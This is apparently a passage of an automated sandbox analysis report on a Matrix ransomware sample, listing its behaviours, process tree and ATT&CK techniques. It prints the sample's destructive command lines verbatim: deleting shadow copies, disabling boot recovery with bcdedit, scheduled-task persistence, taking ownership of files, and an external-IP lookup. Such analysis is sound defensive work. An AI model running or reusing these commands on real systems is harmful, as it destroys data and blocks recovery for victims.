Office\MEDIA\OFFICE14\BULLETS\BD21366_.GIF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGCHKBRD.XML fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1328 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1292 vssadmin.exe 2008 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1216 powershell.exe 1876 c05GxIuC64.exe 1876 c05GxIuC64.exe 1876 c05GxIuC64.exe 1828 powershell.exe 1828 powershell.exe 1828 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1876 c05GxIuC64.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
description pid Process Token: SeDebugPrivilege 1216 powershell.exe Token: SeDebugPrivilege 1876 c05GxIuC64.exe Token: SeLoadDriverPrivilege 1876 c05GxIuC64.exe Token: SeBackupPrivilege 760 vssvc.exe Token: SeRestorePrivilege 760 vssvc.exe Token: SeAuditPrivilege 760 vssvc.exe Token: SeIncreaseQuotaPrivilege 1072 WMIC.exe Token: SeSecurityPrivilege 1072 WMIC.exe Token: SeTakeOwnershipPrivilege 1072 WMIC.exe Token: SeLoadDriverPrivilege 1072 WMIC.exe Token: SeSystemProfilePrivilege 1072 WMIC.exe Token: SeSystemtimePrivilege 1072 WMIC.exe Token: SeProfSingleProcessPrivilege 1072 WMIC.exe Token: SeIncBasePriorityPrivilege 1072 WMIC.exe Token: SeCreatePagefilePrivilege 1072 WMIC.exe Token: SeBackupPrivilege 1072 WMIC.exe Token: SeRestorePrivilege 1072 WMIC.exe Token: SeShutdownPrivilege 1072 WMIC.exe Token: SeDebugPrivilege 1072 WMIC.exe Token: SeSystemEnvironmentPrivilege 1072 WMIC.exe Token: SeRemoteShutdownPrivilege 1072 WMIC.exe Token: SeUndockPrivilege 1072 WMIC.exe Token: SeManageVolumePrivilege 1072 WMIC.exe Token: 33 1072 WMIC.exe Token: 34 1072 WMIC.exe Token: 35 1072 WMIC.exe Token: SeIncreaseQuotaPrivilege 1072 WMIC.exe Token: SeSecurityPrivilege 1072 WMIC.exe Token: SeTakeOwnershipPrivilege 1072 WMIC.exe Token: SeLoadDriverPrivilege 1072 WMIC.exe Token: SeSystemProfilePrivilege 1072 WMIC.exe Token: SeSystemtimePrivilege 1072 WMIC.exe Token: SeProfSingleProcessPrivilege 1072 WMIC.exe Token: SeIncBasePriorityPrivilege 1072 WMIC.exe Token: SeCreatePagefilePrivilege 1072 WMIC.exe Token: SeBackupPrivilege 1072 WMIC.exe Token: SeRestorePrivilege 1072 WMIC.exe Token: SeShutdownPrivilege 1072 WMIC.exe Token: SeDebugPrivilege 1072 WMIC.exe Token: SeSystemEnvironmentPrivilege 1072 WMIC.exe Token: SeRemoteShutdownPrivilege 1072 WMIC.exe Token: SeUndockPrivilege 1072 WMIC.exe Token: SeManageVolumePrivilege 1072 WMIC.exe Token: 33 1072 WMIC.exe Token: 34 1072 WMIC.exe Token: 35 1072 WMIC.exe Token: SeDebugPrivilege 1828 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 960 wrote to memory of 788 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 28 PID 960 wrote to memory of 788 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 28 PID 960 wrote to memory of 788 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 28 PID 960 wrote to memory of 788 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 28 PID 960 wrote to memory of 668 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 30 PID 960 wrote to memory of 668 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 30 PID 960 wrote to memory of 668 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 30 PID 960 wrote to memory of 668 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 30 PID 960 wrote to memory of 1016 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 32 PID 960 wrote to memory of 1016 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 32 PID 960 wrote to memory of 1016 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 32 PID 960 wrote to memory of 1016 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 32 PID 1016 wrote to memory of 1216 1016 cmd.exe 34 PID 1016 wrote to memory of 1216 1016 cmd.exe 34 PID 1016 wrote to memory of 1216 1016 cmd.exe 34 PID 1016 wrote to memory of 1216 1016 cmd.exe 34 PID 960 wrote to memory of 2020 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 35 PID 960 wrote to memory of 2020 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 35 PID 960 wrote to memory of 2020 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 35 PID 960 wrote to memory of 2020 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 35 PID 960 wrote to memory of 2028 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 38 PID 960 wrote to memory of 2028 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 38 PID 960 wrote to memory of 2028 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 38 PID 960 wrote to memory of 2028 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 38 PID 2020 wrote to memory of 2040 2020 cmd.exe 39 PID 2020 wrote to memory of 2040 2020 cmd.exe 39 PID 2020 wrote to memory of 2040 2020 cmd.exe 39 PID 2020 wrote to memory of 2040 2020 cmd.exe 39 PID 2020 wrote to memory of 1076 2020 cmd.exe 41 PID 2020 wrote to memory of 1076 2020 cmd.exe 41 PID 2020 wrote to memory of 1076 2020 cmd.exe 41 PID 2020 wrote to memory of 1076 2020 cmd.exe 41 PID 2028 wrote to memory of 2036 2028 cmd.exe 40 PID 2028 wrote to memory of 2036 2028 cmd.exe 40 PID 2028 wrote to memory of 2036 2028 cmd.exe 40 PID 2028 wrote to memory of 2036 2028 cmd.exe 40 PID 2020 wrote to memory of 1628 2020 cmd.exe 42 PID 2020 wrote to memory of 1628 2020 cmd.exe 42 PID 2020 wrote to memory of 1628 2020 cmd.exe 42 PID 2020 wrote to memory of 1628 2020 cmd.exe 42 PID 960 wrote to memory of 1768 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 43 PID 960 wrote to memory of 1768 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 43 PID 960 wrote to memory of 1768 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 43 PID 960 wrote to memory of 1768 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 43 PID 1768 wrote to memory of 1480 1768 cmd.exe 45 PID 1768 wrote to memory of 1480 1768 cmd.exe 45 PID 1768 wrote to memory of 1480 1768 cmd.exe 45 PID 1768 wrote to memory of 1480 1768 cmd.exe 45 PID 1768 wrote to memory of 1824 1768 cmd.exe 46 PID 1768 wrote to memory of 1824 1768 cmd.exe 46 PID 1768 wrote to memory of 1824 1768 cmd.exe 46 PID 1768 wrote to memory of 1824 1768 cmd.exe 46 PID 2036 wrote to memory of 1676 2036 wscript.exe 47 PID 2036 wrote to memory of 1676 2036 wscript.exe 47 PID 2036 wrote to memory of 1676 2036 wscript.exe 47 PID 2036 wrote to memory of 1676 2036 wscript.exe 47 PID 1768 wrote to memory of 1900 1768 cmd.exe 49 PID 1768 wrote to memory of 1900 1768 cmd.exe 49 PID 1768 wrote to memory of 1900 1768 cmd.exe 49 PID 1768 wrote to memory of 1900 1768 cmd.exe 49 PID 1676 wrote to memory of 1328 1676 cmd.exe 51 PID 1676 wrote to memory of 1328 1676 cmd.exe 51 PID 1676 wrote to memory of 1328 1676 cmd.exe 51 PID 1676 wrote to memory of 1328 1676 cmd.exe 51 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1480 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe"C:\Users\Admin\AppData\Local\Temp\fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe" "C:\Users\Admin\AppData\Local\Temp\NWHoFMNm.exe"2⤵PID:788
-
-
C:\Users\Admin\AppData\Local\Temp\NWHoFMNm.exe"C:\Users\Admin\AppData\Local\Temp\NWHoFMNm.exe" -n2⤵
- Executes dropped EXE
PID:668
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\YvHy7jXm.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7fE2wvr6.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7fE2wvr6.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:2040
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:1076
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1628
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\cdyGVeX2.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\cdyGVeX2.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\rTpEcWQ0.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\rTpEcWQ0.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:1328
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:1000
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:1796
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\K16MKzo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Views/modifies file attributes
PID:1480
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
PID:1900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c c05GxIuC.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1020 -
C:\Users\Admin\AppData\Local\Temp\c05GxIuC.exec05GxIuC.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:864 -
C:\Users\Admin\AppData\Local\Temp\c05GxIuC64.exec05GxIuC.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {1A905D5C-FA64-4CD8-975E-A396E59A7343} S-1-5-21-1405931862-909307831-4085185274-1000:GZAATBZA\Admin:Interactive:[1]1⤵PID:1672
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\rTpEcWQ0.bat"2⤵PID:668
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:2008
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1828 -
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:1292
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1704
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:336
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:1824
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:760
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
1Modify Registry
2